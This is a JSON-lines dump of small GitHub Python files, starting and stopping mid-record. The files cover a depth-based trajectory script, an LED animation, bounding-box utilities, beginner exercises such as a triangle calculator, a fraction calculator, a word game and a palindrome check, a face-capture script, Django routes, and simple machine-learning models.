288\n pos_res, cam = [], []\n d = np.array([0, 0, 0, 1])\n\n # =============================================================================\n # get raw torso center, filter\n # =============================================================================\n bbox, ratio = [], []\n temp_t_1 = 0\n for i in range(frame_count):\n # for i in range(80,95):\n v = res[i]\n if v[2] <= 0.5:\n print('bad prediction in frame: ', i)\n bbox.append((np.nan, np.nan))\n else:\n bbox.append((v[0], v[1]))\n\n bcenter = np.array(bbox)\n bx = interp_(bcenter[:, 0])\n by = interp_(bcenter[:, 1])\n bcenter = np.stack((bx, by)).T\n bx, by = kf2d(bcenter)\n # bx,by = jitter(bcenter)\n res = []\n for i in range(frame_count):\n # for i in range(210,220):\n # real depth estimation\n full_file = \"%s/frame_%06d.raw\" % (frame_Path_filtered, i)\n # full_file = \"%s/frame_%06d.raw\" % (frame_Path_midas, i)\n depth_real = load_real_depth(full_file).numpy()\n\n cam_path = \"%s/frame_%06d.npz\" % (camera_path, i)\n fx, fy, G = load_cam_params(cam_path)\n subx = bx.astype(int)[i]\n suby = by.astype(int)[i]\n\n mean_depth = take_average_depth(depth_real, subx, suby)\n\n # #get 3d position(x,y,z) for current frame\n H, W = depth_real.shape\n z = mean_depth\n x = (subx - W / 2) * z / fx # assume cx,cy is always at img center\n y = (suby - H / 2) * z / fy\n # print(x,y,z)\n # print(pose_distance(G))\n pos_res.append(np.array([x, y, z]))\n\n # get cam_traj by tracking\n d = np.matmul(G, d)\n # print(d)\n cam.append(d)\n\n # from P_cam to P_world with cam_extrinsics\n R = G[:3, :3]\n t = G[:3, 3]\n p = np.array([x, y, z])\n # X = np.matmul(R.T,p) - np.matmul(R.T,t)\n X = np.matmul(R.T, (p - t))\n\n temp = take_average_wp(depth_real, subx, suby, fx, fy, G, subx, suby)\n res.append(temp)\n\n # p = pos_res[:] - pos_res[0] #translation pred from depth map\n # p = other_p[:] - other_p[0]\n p = res[:] - res[0]\n pfx, pfy, pfz = kf3d(p)\n pf = np.stack((-pfx, pfy, pfz)).T\n traj_file_name = os.path.join(root_dir, 'temp/' + folder_id + '/traj.txt')\n np.savetxt(traj_file_name, pf)\n print(\"end\")\n\n # =============================================================================\n # p is not displacement, only scale error\n # d = np.array([0,0,0])\n # res = []\n # for i in range(len(other_p)):\n # d = d + p[i]\n # res.append(d)\n #\n # p = res[:] - res[0]\n # =============================================================================\n\n # c = cam[:] - cam[0] #translation pred from cam ego-motion\n\n # ax.plot3D(c[:,0], c[:,1], c[:,2], 'gray') #the scale is incorrect\n #plot3d(pf)\n\n pg = coords_trans_face(pf)\n #plot3d(pg)\n\n\ncvd_main_process()\n","repo_name":"wisermaclab/CROMOSIM","sub_path":"backend/script/cvd_process.py","file_name":"cvd_process.py","file_ext":"py","file_size_in_byte":7554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"44178217278","text":"from math import sin\nfrom color import random_hue, hue_to_color, random_color, black, gradient_wheel, rgb_to_hsv\nfrom random import random, randint, choice\n\nimport HelperFunctions as helpfunc\n\n\nclass Bullet(object):\n def __init__(self, hexmodel, pos, color, direction):\n self.hexes = hexmodel\n self.color = color\n self.direction = direction\n self.pos = pos\n self.intense = 1\n\n def draw_bullet(self):\n self.hexes.set_cell(self.pos, helpfunc.gradient_wheel(self.color, self.intense))\n\n def move_bullet(self):\n new_spot = helpfunc.hex_in_direction(self.pos, self.direction) # Where is the bullet shooting?\n if self.hexes.cell_exists(new_spot): # Is new spot off the board?\n self.pos = new_spot # On board. Update spot\n self.intense -= 0.05\n return True # Still traveling\n else:\n return False # Off board - kill\n\n\nclass Sprocket(object):\n def __init__(self, hexmodel, center, color, min, thick):\n self.hexes = hexmodel\n self.color = color\n self.min = min\n self.thick = thick\n self.center = center\n self.life = randint(20, 100)\n self.blade = randint(5, 15) / 10.0\n self.color_churn = randint(2, 10)\n\n def draw_sprocket(self, clock):\n for r in range(self.min, self.min + self.thick):\n ring_cells = helpfunc.hex_ring(self.center, r)\n num_cells = len(ring_cells)\n for i in range(num_cells):\n col = (self.color + clock + (r * self.color_churn)) % 255\n attenuation = 1 - ( ((i + clock) % r) * (1.0 / (r * self.blade)))\n if attenuation < 0:\n attenuation = 0\n if r % 2:\n index = num_cells - i - 1\n else:\n index = i\n if self.hexes.cell_exists(ring_cells[index]):\n self.hexes.set_cell(ring_cells[index], gradient_wheel(hue_to_color(col), attenuation))\n\n if helpfunc.one_in(6):\t# Flash the hole - Greg's suggestion\n col = (self.color + clock) % 255\n self.hexes.set_cell(self.center, hue_to_color(col)) # center\n\n for r in range(self.min):\n ring_cells = helpfunc.hex_ring(self.center, r)\n col = (self.color + clock + (r * self.color_churn)) % 255\n self.hexes.set_cells(ring_cells, hue_to_color(col))\n\n def move_sprocket(self):\n self.life -= 1\n return self.life > 0\n\n\nclass Sprockets(object):\n def __init__(self, hexmodel):\n self.name = \"Sprockets\"\n self.hexes = hexmodel\n self.sprockets = [] # List that holds Sprockets objects\n self.bullets = [] # List that holds Bullet objects\n self.direction = 1\n self.clock = 1000\n self.speed = 0.2 * randint(1, 4)\n\n def next_frame(self):\n\n while True:\n\n if len(self.sprockets) < helpfunc.NUM_HEXES:\n for h in helpfunc.all_hexes():\n self.sprockets.append(Sprocket(self.hexes, center=helpfunc.get_center(h), color=random_hue(),\n min=randint(1, 4), thick=7))\n\n self.hexes.black_all_cells()\n\n # Draw the Sprockets\n\n for sprocket in self.sprockets:\n sprocket.draw_sprocket(self.clock)\n if not sprocket.move_sprocket:\n self.sprockets.remove(sprocket)\n\n # Draw the Bullets\n\n for bullet in self.bullets:\n bullet.draw_bullet()\n if not bullet.move_bullet():\n self.bullets.remove(bullet)\n\n yield self.speed \t# random time set in init function\n\n self.clock += self.direction\n\n if helpfunc.one_in(50):\n self.direction *= -1","repo_name":"stevedudek/Hexes","sub_path":"textures/Sprockets.py","file_name":"Sprockets.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13482621902","text":"import torch\n\n\ndef xyxy2xywh(x):\n wh = x[..., 2:] - x[..., :2]\n return torch.cat([x[..., :2], wh], axis=-1)\n\n\ndef cxcywh2xyxy(x):\n mins = x[..., :2] - x[..., 2:] / 2\n maxes = x[..., :2] + x[..., 2:] / 2\n return torch.cat([mins, maxes], axis=-1)\n\n\ndef xyxy2cxcywh(x):\n wh = x[..., 2:] - x[..., :2]\n cxcy = x[..., :2] + wh / 2\n return torch.cat([cxcy, wh], axis=-1)\n\n\ndef calculate_intersections(set_1, set_2):\n \"\"\"\n Args:\n set_1, set_2: float32 tensors. Bounding boxes in `xyxy` format.\n Shape: [n1, 4], [n2, 4].\n\n Returns:\n areas: float32 tensor. Shape: [n1, n2].\n \"\"\"\n set_1 = torch.unsqueeze(set_1, axis=1) # [n1, 1, 2]\n lower_bounds = torch.maximum(set_1[..., :2], set_2[..., :2]) # [n1, n2, 2]\n upper_bounds = torch.minimum(set_1[..., 2:], set_2[..., 2:]) # [n1, n2, 2]\n intersect_rectangle = torch.clip(upper_bounds - lower_bounds, min=0) # [n1, n2, 2]\n areas = torch.prod(intersect_rectangle, axis=-1) # [n1, n2]\n return areas\n\n\ndef calculate_ious(set_1, set_2):\n \"\"\"\n Args:\n set_1, set_2: float32 tensors. Bounding boxes in `xyxy` format.\n Shape: [n1, 4], [n2, 4].\n\n Returns:\n ious: float32 tensor. Shape: [n1, n2].\n \"\"\"\n intersections = calculate_intersections(set_1, set_2) # [n1, n2]\n areas_set_1 = torch.prod(set_1[:, 2:] - set_1[:, :2], axis=-1) # [n1]\n areas_set_2 = torch.prod(set_2[:, 2:] - set_2[:, :2], axis=-1) # [n2]\n\n # Find the union\n areas_set_1 = torch.unsqueeze(areas_set_1, axis=-1) # [n1, 1]\n unions = (areas_set_1 + areas_set_2 - intersections) # [n1, n2]\n ious = intersections / unions # [n1, n2]\n return ious\n","repo_name":"saaresearch/ODRS","sub_path":"ODRS/train_utils/train_model/models/PyTorch-SSD/utils/boxes.py","file_name":"boxes.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"70231143722","text":"import math\n\nclass Háromszög:\n def __init__(self, a, b, c):\n self.a = a\n self.b = b\n self.c = c\n \n def Szerkeszhetőség(self):\n return (self.a + self.b > self.c and\n self.b + self.c > self.a and\n self.c + self.a > self.b)\n \n def Kerület(self):\n return self.a + self.b + self.c\n \n def Terület(self):\n s = (self.a + self.b + self.c) / 2\n return math.sqrt(s * (s - self.a) * (s - self.b) * (s - self.c))\n \n def Háromszögbe_írható_kör(self):\n return self.Terület() / (self.Kerület() / 2)\n \n def Beírás(self):\n f = open(\"eredmeny.txt\", \"a\")\n if self.Szerkeszhetőség():\n f.write(f\"Kerület: {self.Kerület()}\\n\")\n f.write(f\"Terület: {self.Terület()}\\n\")\n f.write(f\"Szerkeszthető: Igen\\n\")\n f.write(f\"Háromszögbe írt kör sugara: {self.Háromszögbe_írható_kör()}\\n\")\n else:\n f.write(\"Nem lehetséges a háromszog létrehozása.\\n\")\n\n\na = float(input(\"Adja meg az a oldal hosszát: \"))\nb = float(input(\"Adja meg a b oldal hosszát: \"))\nc = float(input(\"Adja meg a c oldal hosszát: \"))\n\nháromszög = Háromszög(a, b, c)\nháromszög.Beírás()\n\nif Háromszög.Szerkeszhetőség():\n print(f\"A háromszög kerülete: {Háromszög.Kerület()}\")\n print(f\"A háromszög területe: {Háromszög.Terület()}\")\n print(f\"A háromszög szerkeszthető: Igen\")\n print(f\"A háromszögbe írható kör sugara: {Háromszög.Háromszögbe_írható_kör()}\")\nelse:\n print(\"Nem lehet létrehozni a háromszöget.\")\n\n","repo_name":"hauszmanndavid/Python-03.29","sub_path":"háromszög.py","file_name":"háromszög.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4482737489","text":"'''\n分数電卓\n'''\n\nfrom fractions import Fraction\n\ndef add(a,b):\n print('計算結果: {0} + {1} = {2}'.format(a,b,a+b))\n\ndef subtract(a,b):\n print('計算結果: {0} - {1} = {2}'.format(a,b,a-b))\n\ndef devide(a,b):\n print('計算結果\b: {0} / {1} = {2}'.format(a,b,a/b))\n\ndef multi(a,b):\n print('計算結果: {0} * {1} = {2}'.format(a,b,a*b))\n\nif __name__ == '__main__':\n try:\n a = Fraction(input('分数を入力してください'))\n b = Fraction(input('分数を入力してください'))\n operation = input('希望する操作を選んで下さい。 - add,subtract,devide,multi:')\n if operation == 'add':\n add(a,b)\n if operation == 'subtract':\n subtract(a,b)\n if operation == 'devide':\n devide(a,b)\n if operation == 'multi':\n multi(a,b)\n except ValueError:\n print('無効な入力です')\n","repo_name":"junnnnn06/python","sub_path":"11.分数電卓.py","file_name":"11.分数電卓.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12879529359","text":"import cv2\r\nimport numpy as np\r\n\r\ncam = cv2.VideoCapture(0)\r\nfaceCascade=cv2.CascadeClassifier('C:\\\\Users\\\\omkar\\\\Anaconda3\\\\Lib\\\\site-packages\\\\cv2\\\\data\\\\haarcascade_frontalface_default.xml')\r\n\r\nId=input('enter your id')\r\nname=input('enter your name')\r\nsampleNum=0\r\nwhile(True):\r\n ret, img = cam.read()\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n faces = faceCascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5,)\r\n for (x,y,w,h) in faces:\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\r\n #incrementing sample number \r\n sampleNum=sampleNum+1\r\n #saving the 1\r\n #captured face in the dataset folder\r\n cv2.imwrite(\"ImageDataSet/dataset\"+Id +name+'.'+ str(sampleNum) +\".jpg\", gray)\r\n cv2.imshow('frame',img)\r\n \r\n if cv2.waitKey(5) & 0xFF == ord('q'):\r\n break\r\n # break if the sample number is morethan 20\r\n elif sampleNum>100:\r\n break\r\ncam.release()\r\ncv2.destroyAllWindows()\r\n\r\n\r\n","repo_name":"OmkarNehete/HomeSecuritySystem","sub_path":"face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21469619336","text":"from django.urls import path\n\nfrom . import views\n\n\nurlpatterns = [\n path('parents', views.ParentListView.as_view(), name='parent-list'),\n path('add_parent', views.ParentAddView.as_view(), name='parent-add'),\n path('edit_parent/', views.ParentEditView.as_view(), name='edit_parent'),\n path('update_parent/', views.ParentUpdateView.as_view(), name='update_parent'),\n path('detail_parent/', views.ParentDetailView.as_view(), name='detail_parent'),\n path('delete_parent/', views.DeleteParentView.as_view(), name='delete_parent'),\n]","repo_name":"codingspider/Schoolscript","sub_path":"School/parent/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35827063858","text":"import torch\nfrom PIL import Image\nfrom torchvision import transforms, models\nfrom torch.autograd import Variable\n\nclass Model:\n\tdef __init__(self):\n\t\tself.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\t\treturn\n\n\tdef load(self, model_path):\n\t\tself.dog_identifier_model = models.wide_resnet50_2()\n\t\tnum_features = self.dog_identifier_model.fc.in_features\n\t\tself.dog_identifier_model.fc = torch.nn.Linear(num_features, 120)\n\n\t\tself.dog_identifier_model.load_state_dict(torch.load(model_path, map_location='cpu'))\n\t\tself.dog_identifier_model.eval()\n\n\t\tself.dog_detector_model = models.vgg16(pretrained=True)\n\n\tdef _load_image(self, image):\n\t\t# image = Image.open(image).convert(\"RGB\")\n\n\t\tdata_transform = transforms.Compose([transforms.Scale(224),\n\t\t transforms.CenterCrop(224),\n\t\t transforms.ToTensor(),\n\t\t transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n\t\timage = data_transform(image)[:3, :, :].unsqueeze(0)\n\n\t\treturn image\n\n\tdef _detect_dog(self, image):\n\t\toutput = self.dog_detector_model(image)\n\t\treturn torch.max(output, 1)[1].item()\n\n\tdef predict(self, image):\n\t\timage = self._load_image(image)\n\t\timage = Variable(image).to(self.device)\n\n\t\tif (151 <= self._detect_dog(image) <= 268):\n\t\t\toutput = self.dog_identifier_model(image)\n\t\t\tp = torch.nn.functional.softmax(output, dim=1)\n\t\t\tp = p.data.cpu().numpy()\n\n\t\t\treturn p[0], p[0].argsort()[-5:][::-1]\n\n\t\telse:\n\t\t\tprint(\"No dog detected!\")\n\t\t\treturn None, None","repo_name":"nathan-vo810/Dog-Breed-Identifier","sub_path":"dog_breed_identifier_backend/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17047146360","text":"from sklearn import svm\n\n\ndef svm_(X_train, Y_train, X_test, Y_test):\n # Create model instance and fit model\n clf = svm.SVC(probability=True)\n clf.fit(X_train, Y_train)\n\n # Make predictions\n train_predict = clf.predict(X_train)\n train_proba = clf.predict_proba(X_train)\n print(\n f'Y_train: {Y_train}\\ntrain_predict: {train_predict}\\ntrain_proba: \\n{train_proba}\\naccuracy: {clf.score(X_train, Y_train)}\\n')\n\n test_predict = clf.predict(X_test)\n test_proba = clf.predict_proba(X_test)\n print(\n f'Y_test: {Y_test}\\ntest_predict: {test_predict}\\ntest_proba: \\n{test_proba}\\naccuracy: {clf.score(X_test, Y_test)}\\n')\n\n\nif __name__ == \"__main__\":\n import numpy as np\n from sklearn.model_selection import train_test_split\n\n # Create a dataset and give any value\n X, Y = np.arange(10).reshape((5, 2)), range(5)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=.2)\n print(f\"X:\\n{X}\\nY:{Y}\")\n\n svm_(X_train, Y_train, X_test, Y_test)\n","repo_name":"LWIZN/sklearn_classifier_test","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34070574558","text":"\"\"\"\nDetermine if a given string is a palindrome\nA palindrome is sequence that reads same backwards as forwards. \n\n“Anna”, for example is a palindrome.\n-> Ana\n-> abc cba\n-> Note that we have a capital A \n\nThe task is to determine if a given string is a palindrome\n\"\"\"\ndef is_palindrome(input_string):\n # Idea 3\n # Access the first element with a 0.\n # Last element with length - 1.\n # Loop that compares first with last, second with penultimate, and so on ...\n # Ignore the middle letter if we have an oddly-numbered word.\n # Time complexity?\n # -> .lower()\n # -> rest will be O(n/2)\n\n # Should we do .lower() for the whole string? Or on the fly (in the loop)?\n # If we do .lower() on a lower-case string, we still have to check the \n # capitalization of EACH character!\n\n # input_string = abc -> odd will ignore middle character\n # input_string = abbc -> even will check middle characters\n\n first_index = 0\n # last_index = len(input_string) - 1\n while first_index < len(input_string) // 2:\n # if input_string[first_index] == input_string[len(input_string) - first_index - 1]:\n if input_string[first_index].lower() == input_string[-(first_index + 1)].lower():\n first_index += 1\n else:\n return False\n\n return True\n\nif is_palindrome(\"ABCC CCCA\"):\n print(\"True\")\nelse: \n print(\"False\") # -> This one\n\nif is_palindrome(\"Anna\"):\n print(\"True\") # -> This one\nelse:\n print(\"False\")\n\nif is_palindrome(\"Ana\"):\n print(\"True\") # -> This one\nelse:\n print(\"False\")\n\nif not is_palindrome(\"Jan\"):\n print(\"True\")\nelse:\n print(\"False\") # -> This one\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"janspoerer/computational-semantics","sub_path":"mock_exam/_01_palindrome.py","file_name":"_01_palindrome.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13664651591","text":"import random\r\n\r\ndef guessWord():\r\n wordlist = [\"test\", \"word\", \"rhythm\", \"mystic\"]\r\n\r\n randnum = random.randint( 0, len(wordlist) ) # get rand num between 0 and length of wordlist\r\n secret = wordlist[randnum - 1] # -1 because of 0-based indexing\r\n so_far = [\"_\"] * len(secret)\r\n guesses = [] # start with an empty string of guesses\r\n turns = 5 # can change this number\r\n\r\n still_playing = True\r\n\r\n \r\n # GAME LOOP\r\n while (still_playing) and (turns > 0): # while the total word guessed is not the secret word, ie, game isn't over yet\r\n print(\"You have \" + str(turns) + \" turns left!\")\r\n print(\"Your guesses so far are: \" + str(so_far))\r\n \r\n guess = input(\"Guess a letter: \") # guess 1 letter\r\n guesses = guesses.append(guess)\r\n\r\n if guess in guesses: # check if the letter is in the already-guessed letters\r\n print(\"You already guessed that letter!\")\r\n\r\n elif guess not in secret: # if letter isn't in guesses and isn't in secret...\r\n print(\"Your guessed letter, \" + guess + \", isn't in the secret word\")\r\n\r\n\r\n elif guess in secret: # if the guess is in secret and hasn't been guessed already\r\n for i in range(len(secret)): # looping over the length of secret word\r\n if guess == secret[i]: # compare the guessed letter to the letter whose index we're on\r\n so_far[i] = guess # update so_far so that its guessed letter matches the secret\r\n\r\n\r\n # check if the game is won yet\r\n correct = 0\r\n for i in range(len(secret)):\r\n if so_far[i] == secret[i]: # check if the secret's letter at that index is the same as so_far's index\r\n correct = correct + 1\r\n \r\n if correct == len(secret): # if the number of correct letters are the same as the length of the secret word, then all of so_far is correct\r\n still_playing = False\r\n turns = turns + 1\r\n\r\n turns = turns - 1\r\n\r\n # IS THE GAME OVER?\r\n # if the game was lost, ie, not all letters were guessed before turns ran out\r\n if turns == 0:\r\n print(\"You ran out of turns! The secret word was: \" + secret)\r\n else: # if the game wasn't ended because you ran out of turns\r\n print(\"You won! Your word was: \" + secret)\r\n\r\n\r\n\r\nguessWord()\r\n","repo_name":"skamkam/empow","sub_path":"badge4_guesstheword.py","file_name":"badge4_guesstheword.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7227113060","text":"# -*- coding:utf-8 -*-\nimport itertools\nH, W = map(int, input().split())\ns = [ list(input()) for h in range(H) ]\nfor y in range(H):\n for x in range(W):\n if s[y][x] == '#':\n continue\n y1 = [ tmp for tmp in [ y-1, y, y+1 ] if tmp >= 0 and tmp < H ]\n x1 = [ tmp for tmp in [ x-1, x, x+1 ] if tmp >= 0 and tmp < W ]\n bomb = 0\n for pair in itertools.product(y1,x1):\n if pair[0] == y and pair[1] == x:\n continue\n if s[pair[0]][pair[1]] == '#':\n bomb += 1\n else:\n pass\n s[y][x] = str(bomb)\nfor y in range(H):\n print(''.join(s[y]))\n","repo_name":"Lischero/Atcoder","sub_path":"ABC075/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"219891710","text":"import numpy as np\nimport scipy.special as sc\nimport math\n\n\nclass Model(object):\n\n def __init__(self):\n self.num_input_features = None\n\n def fit(self, X, y):\n \"\"\" Fit the model.\n\n Args:\n X: A compressed sparse row matrix of floats with shape\n [num_examples, num_features].\n y: A dense array of ints with shape [num_examples].\n \"\"\"\n raise NotImplementedError()\n\n def predict(self, X):\n \"\"\" Predict.\n\n Args:\n X: A compressed sparse row matrix of floats with shape\n [num_examples, num_features].\n\n Returns:\n A dense array of ints with shape [num_examples].\n \"\"\"\n raise NotImplementedError()\n\n\nclass Useless(Model):\n\n def __init__(self):\n super().__init__()\n self.reference_example = None\n self.reference_label = None\n\n def fit(self, X, y):\n self.num_input_features = X.shape[1]\n # Designate the first training example as the 'reference' example\n # It's shape is [1, num_features]\n self.reference_example = X[0, :]\n # Designate the first training label as the 'reference' label\n self.reference_label = y[0]\n self.opposite_label = 1 - self.reference_label\n\n def predict(self, X):\n if self.num_input_features is None:\n raise Exception('fit must be called before predict.')\n # Perhaps fewer features are seen at test time than train time, in\n # which case X.shape[1] < self.num_input_features. If this is the case,\n # we can simply 'grow' the rows of X with zeros. (The copy isn't\n # necessary here; it's just a simple way to avoid modifying the\n # argument X.)\n num_examples, num_input_features = X.shape\n if num_input_features < self.num_input_features:\n X = X.copy()\n X._shape = (num_examples, self.num_input_features)\n # Or perhaps more features are seen at test time, in which case we will\n # simply ignore them.\n if num_input_features > self.num_input_features:\n X = X[:, :self.num_input_features]\n # Compute the dot products between the reference example and X examples\n # The element-wise multiply relies on broadcasting; here, it's as if we first\n # replicate the reference example over rows to form a [num_examples, num_input_features]\n # array, but it's done more efficiently. This forms a [num_examples, num_input_features]\n # sparse matrix, which we then sum over axis 1.\n dot_products = X.multiply(self.reference_example).sum(axis=1)\n # dot_products is now a [num_examples, 1] dense matrix. We'll turn it into a\n # 1-D array with shape [num_examples], to be consistent with our desired predictions.\n dot_products = np.asarray(dot_products).flatten()\n # If positive, return the same label; otherwise return the opposite label.\n same_label_mask = dot_products >= 0\n opposite_label_mask = ~same_label_mask\n y_hat = np.empty([num_examples], dtype=np.int)\n y_hat[same_label_mask] = self.reference_label\n y_hat[opposite_label_mask] = self.opposite_label\n return y_hat\n\n\nclass LogisticRegression(Model):\n\n def __init__(self, gd_iterations, number_of_features_to_select, online_learning_rate):\n super().__init__()\n # TODO: Initializations etc. go here.\n self.w = None\n self.online_learning_rate = online_learning_rate\n self.gd_iterations = gd_iterations\n self.number_of_features_to_select = number_of_features_to_select\n self.indices = None\n self.num_examples = None\n\n # def fit(self, X, y):\n # # TODO: Write code to fit the model.\n # self.num_input_features = X.shape[1]\n # num_examples,num_input_features = X.shape;\n # self.w=np.zeros([num_input_features],dtype=np.float)[np.newaxis]\n # g = np.empty([num_examples], dtype=np.int)[np.newaxis]\n # g_neg = np.empty([num_examples], dtype=np.int)[np.newaxis]\n # ones=np.ones([num_examples])\n # X_neg=-1*X;\n # # print(g.shape)\n #\n # for k in range(self.gd_iterations):\n # for i,row in enumerate(X.toarray()):\n # # print(row.shape)\n # row=row[np.newaxis]\n # val=self.w@row.T\n # # print(val.shape)\n # prob=sc.expit(val[0,0]);\n # g[0,i]=y[i]*(1-prob);\n # g_neg[0,i]=(1-y[i])*(prob);\n #\n #\n #\n # # grad=(np.multiply(y,g_neg)@X)+(np.multiply(ones-y,g)@((-1)*X))\n # # g=g[np.newaxis]\n # # g_neg=g[np.newaxis]\n # # print(X.shape)\n # grad_1=g*X\n # # print(grad_1.shape)\n # grad_2=g_neg*X_neg\n # delta = np.zeros(shape=(1, self.num_input_features), dtype=float);\n # grad=grad_1+grad_2;\n #\n # self.w= self.w + self.online_learning_rate*grad;\n\n def fit(self, X, y):\n # TODO: Write code to fit the model.\n\n self.num_examples, self.num_input_features = X.shape\n if self.number_of_features_to_select != -1:\n X = self.feature_Selection(X, y)\n\n self.num_examples, self.num_input_features = X.shape\n\n self.w = np.zeros(shape=(1, self.num_input_features), dtype=float)\n prob = np.zeros(shape=(1, self.num_examples), dtype=float)\n prob_neg = np.zeros(shape=(1, self.num_examples), dtype=float)\n\n for i in range(self.gd_iterations):\n delta = np.zeros(shape=(1, self.num_input_features), dtype=float)\n prob = sc.expit(self.w@X.T)\n prob_neg = sc.expit(-1 * (self.w@X.T))\n\n delta = (np.multiply(y, prob_neg)) * X + \\\n (np.multiply(1 - y, prob)) * (-1 * X)\n self.w += self.online_learning_rate * delta\n\n def predict(self, X):\n # TODO: Write code to make predictions.\n if self.num_input_features is None:\n raise Exception('fit must be called before predict.')\n\n try:\n if self.num_input_features != -1:\n X = X[:, self.indices]\n except:\n pass\n\n num_examples, num_input_features = X.shape\n if num_input_features < self.num_input_features:\n X = X.copy()\n X._shape = (num_examples, self.num_input_features)\n # Or perhaps more features are seen at test time, in which case we will\n # simply ignore them.\n if num_input_features > self.num_input_features:\n X = X[:, :self.num_input_features]\n try:\n if self.num_input_features != -1:\n X = X[:, self.indices]\n except:\n pass\n\n y_hat = np.empty([num_examples], dtype=np.int)\n\n for i, row in enumerate(X.toarray()):\n row = row[np.newaxis]\n val = self.w@row.T\n prob = sc.expit(val)\n if prob >= 0.5:\n y_hat[i] = 1\n else:\n y_hat[i] = 0\n return y_hat\n\n def calculate_conditional_entropy(self, prob_x1_y1, prob_x1_y0, prob_x0_y1, prob_x0_y0, px0, px1):\n log_prob__y1_x0 = log_prob__y1_x1 = log_prob__y0_x0 = log_prob__y0_x1 = 0\n\n if (prob_x0_y1 == 0):\n log_prob__y1_x0 = 0\n else:\n log_prob__y1_x0 = np.log2(prob_x0_y1)\n\n if (prob_x1_y1 == 0):\n log_prob__y1_x1 = 0\n else:\n log_prob__y1_x1 = np.log2(prob_x1_y1)\n\n if (prob_x1_y0 == 0):\n log_prob__y0_x1 = 0\n else:\n log_prob__y0_x1 = np.log2(prob_x1_y0)\n\n if (prob_x0_y0 == 0):\n log_prob__y0_x0 = 0\n else:\n log_prob__y0_x0 = np.log2(prob_x0_y0)\n\n entropy_yx1 = (prob_x1_y1 * log_prob__y1_x1) + \\\n (prob_x1_y0 * log_prob__y0_x1)\n entropy_yx0 = (prob_x0_y1 * log_prob__y1_x0) + \\\n (prob_x0_y0 * log_prob__y0_x0)\n entropy_yx = -((px0 * entropy_yx0) + (px1 * entropy_yx1))\n\n return entropy_yx\n\n # Calculate Information gain for each feature\n def feature_Selection(self, X, y):\n # Calculate H(Y)\n unique_values_y, counts_y = np.unique(y, return_counts=True)\n prob_y0 = counts_y[0] / self.num_examples\n prob_y1 = counts_y[1] / self.num_examples\n # entropy_y = -((prob_y0)*np.log2(prob_y0)) -((prob_y1)*np.log2(prob_y1))\n ig = np.zeros([self.num_input_features])\n\n for feature in range(self.num_input_features):\n # flatten to 1 dimension\n temp = X[:, feature].toarray().squeeze()\n\n # count unique values in each column\n count_for_each_col = np.zeros([2])\n unique_values_xj, count_of_xj = np.unique(temp, return_counts=True)\n\n count_x1_y1 = count_x1_y0 = count_x0_y1 = count_x0_y0 = 0\n\n # if data is continuous we will use the mean as the threshold\n if len(unique_values_xj) != 2:\n mean = np.mean(temp)\n count_for_each_col[0] = np.where(temp < mean)[0].size\n count_for_each_col[1] = np.where(temp >= mean)[0].size\n # Get joint probabilities for x and y\n for row in range(self.num_examples):\n if(temp[row] < mean):\n if(y[row] == unique_values_y[0]):\n count_x0_y0 += 1\n elif(y[row] == unique_values_y[1]):\n count_x0_y1 += 1\n elif(temp[row] >= mean):\n if(y[row] == unique_values_y[0]):\n count_x1_y0 += 1\n elif(y[row] == unique_values_y[1]):\n count_x1_y1 += 1\n\n else:\n count_for_each_col[0] = count_of_xj[0]\n count_for_each_col[1] = count_of_xj[1]\n # Get joint probabilities for x and y\n for row in range(0, self.num_examples):\n if(temp[row] == 0):\n if(y[row] == unique_values_y[0]):\n count_x0_y0 += 1\n elif(y[row] == unique_values_y[1]):\n count_x0_y1 += 1\n elif(temp[row] == 1):\n if(y[row] == unique_values_y[0]):\n count_x1_y0 += 1\n elif(y[row] == unique_values_y[1]):\n count_x1_y1 += 1\n\n prob_xj_0 = count_for_each_col[0] / self.num_examples\n prob_xj_1 = count_for_each_col[1] / self.num_examples\n\n prob_x1_y1 = count_x1_y1 / count_for_each_col[1]\n prob_x1_y0 = count_x1_y0 / count_for_each_col[1]\n\n if(count_for_each_col[0] == 0):\n prob_x0_y0 = 0\n prob_x0_y1 = 0\n else:\n prob_x0_y1 = count_x0_y1 / count_for_each_col[0]\n prob_x0_y0 = count_x0_y0 / count_for_each_col[0]\n\n # calculate H(Y/X) for the 